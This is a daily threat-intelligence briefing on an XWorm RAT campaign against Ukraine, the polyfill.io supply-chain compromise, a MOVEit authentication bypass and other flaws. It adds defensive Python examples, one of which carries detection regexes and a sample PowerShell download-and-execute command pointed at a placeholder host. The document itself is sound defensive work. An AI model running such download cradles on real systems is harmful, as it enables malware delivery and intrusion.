
Cyware Daily Threat Intelligence


Daily Threat Briefing June 26, 2024

Researchers at Cyble have detailed a multi-stage campaign by the Russia-linked UAC-0184 group against Ukraine. The attackers use DLL sideloading and a tool dubbed Shadowloader to inject the XWorm RAT into a running process. XWorm offers a broad set of capabilities, from data theft to launching DDoS attacks.

In parallel, a new critical bug in MOVEit Transfer has drawn the attention of the security community. The flaw lets attackers bypass authentication and gain unauthorized access to affected systems.

Meanwhile, the FBI warned of a new cryptocurrency scam in which fraudsters pose as reputable lawyers and law firms, offering fictitious cryptocurrency recovery services to people who have already been defrauded.

Top Malware Reported in the Last 24 Hours

XWorm RAT targets Ukraine

Cyble identified the Russia-linked threat actor group UAC-0184 targeting Ukraine with the XWorm RAT. The campaign begins with a malicious LNK shortcut file disguised as an Excel document; opening it runs a PowerShell script that downloads and executes further payloads. The attackers then use DLL sideloading and a tool called Shadowloader to inject the XWorm RAT into a running process. XWorm's capabilities include data theft, DDoS attacks, and hijacking cryptocurrency transactions by swapping wallet addresses on the clipboard. How the LNK file reaches victims has not been confirmed, but phishing emails are the likely delivery vector.
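The chain above leaves three recognisable shapes in endpoint telemetry: a shortcut with a document-style double extension, PowerShell launched with a download-and-execute command line, and a signed host binary loading an unsigned DLL from a user-writable directory (the sideloading step). The following added example, written for this briefing and not code from Cyble or the campaign report, triages simplified Sysmon-style events for those shapes. The regexes, field names and sample events are constructed for illustration, not indicators taken from the report.

```python
import re

# Heuristics for the three stages. Patterns are assumptions for this example.
CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b"
    r"|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass",
    re.IGNORECASE,
)
DOC_MASQUERADE = re.compile(r"\.(xlsx?|xlsm|docx?|pdf)\.lnk$", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\programdata\\|\\windows\\temp\\",
    re.IGNORECASE,
)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process(ev):
    """Flag PowerShell started with a download cradle; note an explorer.exe parent."""
    reasons = []
    if _basename(ev["image"]) in ("powershell.exe", "pwsh.exe") and CRADLE.search(ev["command_line"]):
        reasons.append("PowerShell download/execute cradle")
        if _basename(ev["parent_image"]) == "explorer.exe":
            reasons.append("spawned by explorer.exe, consistent with a double-clicked shortcut")
    return reasons


def triage_file(ev):
    """Flag shortcuts whose name imitates an Office or PDF document."""
    return ["shortcut masquerading as a document"] if DOC_MASQUERADE.search(ev["path"]) else []


def triage_imageload(ev):
    """A signed host pulling an unsigned DLL from a user-writable path is the
    shape DLL sideloading leaves in image-load telemetry."""
    if ev["host_signed"] and not ev["dll_signed"] and USER_WRITABLE.search(ev["dll"]):
        return ["unsigned DLL loaded from user-writable path by signed host (sideloading candidate)"]
    return []


HANDLERS = {"process": triage_process, "file": triage_file, "imageload": triage_imageload}


def triage(events):
    """Return [(event_index, [reasons, ...])] for every event that trips a heuristic."""
    hits = []
    for i, ev in enumerate(events):
        reasons = HANDLERS[ev["kind"]](ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry (not real events from the campaign).
SAMPLE_EVENTS = [
    {"kind": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'''powershell.exe -w hidden -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.bin','C:\Users\alice\AppData\Local\Temp\p.bin')"'''},
    {"kind": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile"},  # user opened a console: benign
    {"kind": "file", "path": r"C:\Users\alice\Downloads\Invoice_Q2.xlsx.lnk"},
    {"kind": "file", "path": r"C:\Users\alice\Downloads\Invoice_Q2.xlsx"},
    {"kind": "imageload", "image": r"C:\Users\alice\AppData\Local\Temp\viewer.exe", "host_signed": True,
     "dll": r"C:\Users\alice\AppData\Local\Temp\helper.dll", "dll_signed": False},
    {"kind": "imageload", "image": r"C:\Windows\System32\svchost.exe", "host_signed": True,
     "dll": r"C:\Windows\System32\ntdll.dll", "dll_signed": True},
]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["kind"], "; ".join(reasons))
```

Each heuristic on its own is noisy (users do launch PowerShell from Explorer, and some legitimate installers load unsigned DLLs from Temp); the value is in correlating the three on one host within a short window, which is how a detection rule built from this would be scoped.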

Are you using Polyfill.io?

The polyfill[.]io domain, long used to serve JavaScript polyfills, has been compromised and is now delivering malicious code to over 100,000 websites that embed it. The domain was bought by a Chinese company, and the script it serves has been turned into a supply chain attack that injects malicious JavaScript into visitors' browsers. The injected code is generated dynamically from the request's HTTP headers, so different visitors receive different payloads, which makes it difficult to detect and block. Google has started blocking Google Ads for affected websites to reduce traffic and potential victims.
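The practical check is to find every page on your site that still pulls a script from polyfill[.]io and remove or self-host it. The following added example, written for this briefing and not taken from any of the reports it summarises, parses HTML for external script tags, flags references to the compromised host, and separately flags any other cross-origin script that carries no `integrity` attribute. The sample HTML and the `cdn.example.net` host are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the page reports as compromised. Extend as your own allow/deny policy requires.
COMPROMISED_HOSTS = {"polyfill.io"}


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> element that has a src."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attributes = {name.lower(): (value or "") for name, value in attrs}
        if "src" in attributes:
            self.scripts.append(attributes)


def _host(src):
    # Protocol-relative references ("//cdn.polyfill.io/...") have no scheme;
    # give them one so urlparse yields a hostname.
    if src.startswith("//"):
        src = "https:" + src
    return (urlparse(src).hostname or "").lower()


def _is_compromised(host):
    return any(host == bad or host.endswith("." + bad) for bad in COMPROMISED_HOSTS)


def audit_scripts(html, site_host):
    """Return [(src, finding)] for third-party scripts.

    finding is "compromised-host" for polyfill[.]io references and "no-sri" for any
    other cross-origin script without an integrity attribute. Same-origin and
    relative script references are not reported."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for attributes in collector.scripts:
        src = attributes["src"]
        host = _host(src)
        if not host or host == site_host.lower():
            continue
        if _is_compromised(host):
            findings.append((src, "compromised-host"))
        elif not attributes.get("integrity"):
            findings.append((src, "no-sri"))
    return findings


# Constructed sample page, not a real site. The integrity value is a dummy.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=default"></script>
<script src="//polyfill.io/v3/polyfill.min.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-dummyhashfortheexample" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<script src="/static/app.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for src, finding in audit_scripts(SAMPLE_HTML, "www.example.com"):
        print(f"{finding:17} {src}")
```

Note the caveat behind the "no-sri" finding: Subresource Integrity pins a script to one hash, and polyfill[.]io by design returned different code per request depending on the User-Agent and other headers, so SRI could never have been applied to it. A third-party script that cannot be pinned is one you have to remove or self-host rather than wrap in a check.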

Top Vulnerabilities Reported in the Last 24 Hours

New critical bug in MOVEit Transfer

A critical vulnerability, CVE-2024-5806, has been identified in the SFTP module of MOVEit Transfer. It allows attackers to bypass authentication and gain unauthorized access to the system. The vulnerability stems from improper validation of user-supplied input during the authentication process. Affected versions are MOVEit Transfer 2023.0.0 to 2023.0.10, 2023.1.0 to 2023.1.5, and 2024.0.0 to 2024.0.1. Progress strongly urges all MOVEit Transfer customers to upgrade immediately to the patched releases 2023.0.11, 2023.1.6, and 2024.0.2.
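Checking an inventory against those ranges has one trap: version strings compare lexically, so "2023.0.9" sorts after "2023.0.11" and a vulnerable host is reported as patched. The following added example, written for this briefing and not code from Progress, parses versions into numeric tuples, maps each host to its release branch, and classifies it against the fixed release for that branch. The inventory data is constructed for the example.

```python
# Fixed release per branch, from the advisory quoted above.
FIXED_IN = {
    (2023, 0): (2023, 0, 11),
    (2023, 1): (2023, 1, 6),
    (2024, 0): (2024, 0, 2),
}


def parse_version(text):
    """'2023.0.10' -> (2023, 0, 10). Tuples compare numerically; strings do not."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected MOVEit Transfer version string: {text!r}")
    return tuple(int(p) for p in parts)


def status(version_text):
    """'vulnerable', 'patched', or 'unsupported-branch' for a branch the advisory
    does not list (such hosts need manual review rather than a silent pass)."""
    version = parse_version(version_text)
    fixed = FIXED_IN.get(version[:2])
    if fixed is None:
        return "unsupported-branch"
    return "vulnerable" if version < fixed else "patched"


def audit(inventory):
    """inventory: {hostname: version string} -> {hostname: status}."""
    return {host: status(version) for host, version in inventory.items()}


# Constructed sample inventory, not real hosts.
INVENTORY = {
    "mft-01.corp.example": "2023.0.9",
    "mft-02.corp.example": "2023.0.11",
    "mft-03.corp.example": "2024.0.1",
    "mft-legacy.corp.example": "2022.1.4",
}

if __name__ == "__main__":
    for host, result in audit(INVENTORY).items():
        print(f"{host:26} {INVENTORY[host]:10} {result}")
```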

ADOdb flaw fixed in Ubuntu

The ADOdb PHP database abstraction library has been found to contain multiple vulnerabilities: a SQL injection flaw (CVE-2016-7405), a cross-site scripting flaw (CVE-2016-4855), and an authentication bypass (CVE-2021-3850). The Ubuntu security team has released updates fixing them in Ubuntu 22.04 LTS, 20.04 LTS, 18.04 ESM, and 16.04 ESM.

Firmware update for AirPods

Apple has patched a vulnerability (CVE-2024-27867) in the firmware of AirPods and Beats headphones that could allow an attacker to gain unauthorized access to the headphones. The issue is a flaw in the authentication step performed when the headphones seek a connection to a previously paired device: an attacker within Bluetooth range could spoof the intended source device and connect. Affected models are AirPods (2nd generation and later), AirPods Pro, AirPods Max, Powerbeats Pro, and Beats Fit Pro; the fix ships as AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8.

Top Scams Reported in the Last 24 Hours

Beware of fake crypto recovery services

The FBI issued a warning about a new wave of cybercriminals posing as lawyers and law firms, offering fake cryptocurrency recovery services to defraud victims of cryptocurrency scams. These scammers use tactics such as verification requests, upfront fees, and referencing legitimate institutions to appear credible. Victims have reported over $9.9 million in losses between February 2023 and February 2024.
